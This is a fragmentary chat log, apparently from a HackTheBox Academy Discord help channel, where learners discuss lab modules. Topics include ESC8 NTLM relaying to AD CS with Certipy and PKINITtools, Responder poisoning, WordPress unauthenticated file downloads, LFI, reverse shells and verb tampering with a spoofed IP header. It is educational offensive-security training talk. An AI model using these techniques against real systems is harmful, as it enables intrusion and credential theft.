I've tried both typing and pasting it, with and without quotation marks. The actual question was:

To get the flag, start the above exercise, then use cURL to download the file returned by '/download.php' in the server shown above.

I found the filename that I can't submit by first downloading the file, then using -i to display what was in download.php. Is it possible this wasn't what the question was after?

scenic current
worldly ivy
#

Ope, no it was not this format

#

Thanks, guess I'll keep tinkering

pulsar needle
faint hamlet
#

Another way to exploit ESC8 is through https://github.com/ly4k/Certipy/wiki/06-‐-Privilege-Escalation#esc8-ntlm-relay-to-ad-cs-web-enrollment, also try the find to identify the vulnerability, you would need dnschef.

Back to your question, you can turn your ticket to NTLM hash through getnthash.

https://github.com/dirkjanm/PKINITtools

GitHub

Tools for Kerberos PKINIT and relaying to AD CS. Contribute to dirkjanm/PKINITtools development by creating an account on GitHub.

GitHub

Tool for Active Directory Certificate Services enumeration and abuse - ly4k/Certipy

shadow latch
#

i have a question about LLMNR and NBT-NS poisoning, it works on VPN? using Responder

spiral sapphire
#

Good evening, I'm about to launch the AD enumeration and attacks module as soon as I've finished the introduction to AD. For those of you who have done it, how long did it take to finish? According to HTB it's "7 days" which seems crazy 😮

median wharf
#

need help on Credential Hunting in Network Shares

full wagon
#

Hacking wordpress - skills assessment:
I have submitted all the qustions but one, "Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download." I got a bit confused about what file would contain the flag, so I went on with the other qustions and skipped that one for last. Figured things would align once getting a shell. but. Even with a reverse shell on the box, I still don't understand which file I'm looking for. None of my 'find', 'grep' or poking around skills solves my problem. Would appreciate some kind of idea on what to search for. Thank you.

glacial lava
#

Question on AEN Module, unable to figure out where I am going wrong on the Verb tampering.

gray yacht
full wagon
#

yeah, I found it and I can use it to read files on the server (doing it now), so found the mentioned LFI, but still no idea which file should contain the flag 🙃

grizzled schooner
pulsar needle
gray yacht
full wagon
#

Ok, I will have to poke around, got a shell so I'll see what I can find, thanks

gray yacht
full wagon
#

Ok, I think I misread the following question about lfi and grouped them together. (the download and the version for lfi plugin). I'll rethink and see what I can find. Thanks!

fathom pendant
pulsar needle
#

Thanks, I was just wondering I thought it was like a modules change or something about exam rules.

sharp wadi
fathom pendant
sharp wadi
magic sphinx
#

hello guys

storm elk
#

Hello 🙋‍♂️

pliant yacht
#

anyone able to help me finish off this

+ 1 Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download.

#

but im unsure on where / how to find the file im looking for

rapid lichen
sacred rock
#

Not the correct CVE.

pliant yacht
gray yacht
fathom pendant
#

@pliant yacht please don't spoil module content :))))))

covert kelp
#

Has anyone finished Reliable Threat? I've been at it for 3 days looking for one answer and about to give up, someone PM me plZ

clear seal
#

This web proxies module is terrible…

zealous trench
#

Hey guys

glacial lava
#

Hey @zealous trench

fathom pendant
#

with?

glacial lava
#

Question on AEN Module, unable to figure out where I am going wrong on the Verb tampering. I am not getting the proper response after adding X-Custom-IP-Authorization:

acoustic owl
pliant yacht
fathom pendant
pliant yacht
#

its the correct plugin?

glacial lava
sacred rock
fathom pendant
#

@zealous trench so you just admitted to doing a crime :) congratulations

fathom pendant
#

see if loop device is running
lsmod | grep loop
if it's not
modprobe loop

#

might need to run as sudo*

grizzled schooner
#

─$ lsmod | grep loop loop 40960 1

#

Not sure what it means unfortunately --> tried running with loop0p1, I saw that in /dev/ but I didn't see loop0p2